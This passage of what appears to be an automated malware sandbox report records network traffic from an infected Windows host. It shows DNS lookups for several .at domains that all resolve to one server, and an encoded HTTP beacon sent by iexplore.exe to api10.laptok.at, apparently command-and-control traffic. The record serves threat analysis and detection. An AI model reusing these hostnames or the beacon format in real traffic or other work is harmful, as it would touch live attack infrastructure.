Feb 12, 2021 10:01:28.562587976 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562622070 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562647104 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562654972 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562684059 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562686920 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562712908 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562741041 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562741995 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562768936 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562798023 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562825918 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562829018 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562860012 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562891006 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562917948 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562946081 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562947989 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.562974930 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.562978029 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.563004017 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563031912 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563055038 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.563060045 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563102007 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563123941 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.563148022 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563174963 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563179970 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.563210964 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563241959 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563242912 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.563271046 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563298941 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.563299894 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.563502073 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602380991 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602430105 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602468967 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602515936 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602547884 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602579117 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602596045 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602612019 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602634907 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602641106 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602643967 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602679014 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602709055 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602746010 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602747917 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602780104 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602793932 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602813959 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602847099 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602878094 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602883101 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602907896 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602922916 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.602940083 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.602971077 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603008032 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603034973 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603041887 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603071928 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603104115 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603110075 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603135109 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603164911 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603169918 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603195906 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603225946 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603233099 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603264093 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603297949 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603298903 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603329897 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603389978 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603424072 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603430986 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603452921 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603456974 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603483915 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603528023 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603558064 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603564978 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603588104 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603589058 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603620052 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603656054 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603688955 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603689909 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603718042 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603748083 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603776932 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603806019 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603811979 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603837013 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603867054 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603903055 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603935003 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603941917 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.603965044 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.603996038 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.604026079 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.604053974 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.604060888 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.604085922 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.604777098 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.638314962 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638345957 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638370991 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638397932 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638423920 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638453007 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638478994 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638477087 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.638499975 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.638504028 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.638504028 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638530016 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638554096 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638556004 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.638577938 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638602018 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.638627052 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.638964891 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644128084 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644162893 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644186974 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644211054 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644229889 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644248962 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644268036 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644288063 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644304991 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644309044 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644330025 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644350052 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644375086 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644401073 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644426107 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644444942 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644464970 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644484043 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644498110 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644503117 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644522905 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644541979 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644567966 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644591093 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644620895 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644635916 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644648075 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644670963 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644695997 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:28.644695997 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644726038 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644825935 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.644833088 CET	49769	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:28.725488901 CET	80	49769	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:38.757679939 CET	49770	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:38.838572979 CET	80	49770	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:38.838912964 CET	49770	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:38.839165926 CET	49770	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:38.839209080 CET	49770	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:38.921955109 CET	80	49770	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:39.190356016 CET	80	49770	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:39.190551996 CET	49770	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:39.190654039 CET	49770	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:39.271554947 CET	80	49770	35.228.31.40	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2021 09:59:01.073117018 CET	56023	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:01.121819973 CET	53	56023	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:02.058203936 CET	58384	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:02.109622002 CET	53	58384	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:03.247157097 CET	60261	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:03.298580885 CET	53	60261	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:04.576015949 CET	56061	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:04.624712944 CET	53	56061	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:06.010441065 CET	58336	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:06.062041044 CET	53	58336	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:26.140899897 CET	53781	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:26.189835072 CET	53	53781	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:28.687211037 CET	54064	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:28.735846996 CET	53	54064	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:29.763158083 CET	52811	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:29.811934948 CET	53	52811	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:30.283058882 CET	55299	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:30.334589005 CET	53	55299	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:30.719877958 CET	63745	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:30.768769979 CET	53	63745	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:31.579225063 CET	50055	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:31.630826950 CET	53	50055	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:32.529510021 CET	61374	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:32.581309080 CET	53	61374	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:33.491802931 CET	50339	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:33.543557882 CET	53	50339	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:48.347873926 CET	63307	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:48.396512985 CET	53	63307	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:48.944744110 CET	49694	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:49.026823997 CET	53	49694	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:49.574100971 CET	54982	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:49.633578062 CET	53	54982	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:49.685648918 CET	50010	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:49.744146109 CET	53	50010	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:49.834877014 CET	63718	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:49.892087936 CET	53	63718	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:49.925010920 CET	62116	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:49.997438908 CET	53	62116	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:50.084736109 CET	63816	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:50.143440962 CET	53	63816	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:50.716137886 CET	55014	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:50.773431063 CET	53	55014	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:51.495033979 CET	62208	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:51.554930925 CET	53	62208	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:51.593105078 CET	57574	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:51.652704954 CET	53	57574	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:52.215941906 CET	51818	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:52.272819996 CET	53	51818	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:53.064474106 CET	56628	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:53.124308109 CET	53	56628	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:54.087716103 CET	60778	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:54.145140886 CET	53	60778	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:54.424375057 CET	53799	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:54.483660936 CET	53	53799	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:54.921461105 CET	54683	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:54.981348038 CET	53	54683	8.8.8.8	192.168.2.6
Feb 12, 2021 09:59:55.806430101 CET	59329	53	192.168.2.6	8.8.8.8
Feb 12, 2021 09:59:55.865994930 CET	53	59329	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:00.058983088 CET	64021	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:00.116115093 CET	53	64021	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:24.436114073 CET	56129	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:24.496398926 CET	53	56129	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:25.435674906 CET	56129	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:25.492722034 CET	53	56129	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:26.451652050 CET	56129	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:26.508831024 CET	53	56129	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:28.417747974 CET	58177	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:28.450640917 CET	56129	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:28.469407082 CET	53	58177	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:28.510066032 CET	53	56129	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:28.883099079 CET	50700	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:28.948097944 CET	53	50700	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:32.466552973 CET	56129	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:32.516196966 CET	53	56129	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:37.831680059 CET	54069	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:37.893255949 CET	53	54069	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:39.357014894 CET	61178	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:39.415757895 CET	53	61178	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:40.322196007 CET	57017	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:40.384507895 CET	53	57017	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:41.245450974 CET	56327	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:41.575987101 CET	53	56327	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:45.231515884 CET	50243	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:45.291739941 CET	53	50243	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:45.293688059 CET	62055	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:45.353811026 CET	53	62055	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:48.685430050 CET	61249	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:48.742515087 CET	53	61249	8.8.8.8	192.168.2.6
Feb 12, 2021 10:00:53.578039885 CET	65252	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:00:53.626722097 CET	53	65252	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:18.998070002 CET	64367	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:19.055290937 CET	53	64367	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:24.009558916 CET	55066	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:24.061239958 CET	53	55066	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:24.246500969 CET	60211	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:24.570854902 CET	53	60211	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:25.311429024 CET	56570	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:25.368586063 CET	53	56570	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:26.085661888 CET	58454	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:26.142653942 CET	53	58454	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:27.141149044 CET	55180	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:27.566539049 CET	53	55180	8.8.8.8	192.168.2.6
Feb 12, 2021 10:01:38.699723005 CET	58721	53	192.168.2.6	8.8.8.8
Feb 12, 2021 10:01:38.756872892 CET	53	58721	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 12, 2021 09:59:55.806430101 CET	192.168.2.6	8.8.8.8	0x3ef9	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:40.322196007 CET	192.168.2.6	8.8.8.8	0x318	Standard query (0)	go.in100k.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:41.245450974 CET	192.168.2.6	8.8.8.8	0x98c9	Standard query (0)	golang.feel500.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:45.231515884 CET	192.168.2.6	8.8.8.8	0x6f1b	Standard query (0)	go.in100k.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:45.293688059 CET	192.168.2.6	8.8.8.8	0x8580	Standard query (0)	golang.feel500.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:48.685430050 CET	192.168.2.6	8.8.8.8	0xe033	Standard query (0)	golang.feel500.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:18.998070002 CET	192.168.2.6	8.8.8.8	0xa36c	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:24.009558916 CET	192.168.2.6	8.8.8.8	0x276f	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:24.246500969 CET	192.168.2.6	8.8.8.8	0xacb3	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:25.311429024 CET	192.168.2.6	8.8.8.8	0xa63a	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:26.085661888 CET	192.168.2.6	8.8.8.8	0x52f2	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:27.141149044 CET	192.168.2.6	8.8.8.8	0x38b	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:38.699723005 CET	192.168.2.6	8.8.8.8	0xe02c	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 12, 2021 09:59:55.865994930 CET	8.8.8.8	192.168.2.6	0x3ef9	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:40.384507895 CET	8.8.8.8	192.168.2.6	0x318	No error (0)	go.in100k.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:41.575987101 CET	8.8.8.8	192.168.2.6	0x98c9	No error (0)	golang.feel500.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:45.291739941 CET	8.8.8.8	192.168.2.6	0x6f1b	No error (0)	go.in100k.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:45.353811026 CET	8.8.8.8	192.168.2.6	0x8580	No error (0)	golang.feel500.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:00:48.742515087 CET	8.8.8.8	192.168.2.6	0xe033	No error (0)	golang.feel500.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:19.055290937 CET	8.8.8.8	192.168.2.6	0xa36c	No error (0)	c56.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:24.061239958 CET	8.8.8.8	192.168.2.6	0x276f	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:24.570854902 CET	8.8.8.8	192.168.2.6	0xacb3	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:25.368586063 CET	8.8.8.8	192.168.2.6	0xa63a	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:26.142653942 CET	8.8.8.8	192.168.2.6	0x52f2	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:27.566539049 CET	8.8.8.8	192.168.2.6	0x38b	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 12, 2021 10:01:38.756872892 CET	8.8.8.8	192.168.2.6	0xe02c	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

go.in100k.at

golang.feel500.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49742	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 09:59:55.964468002 CET	1639	OUT	GET /api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
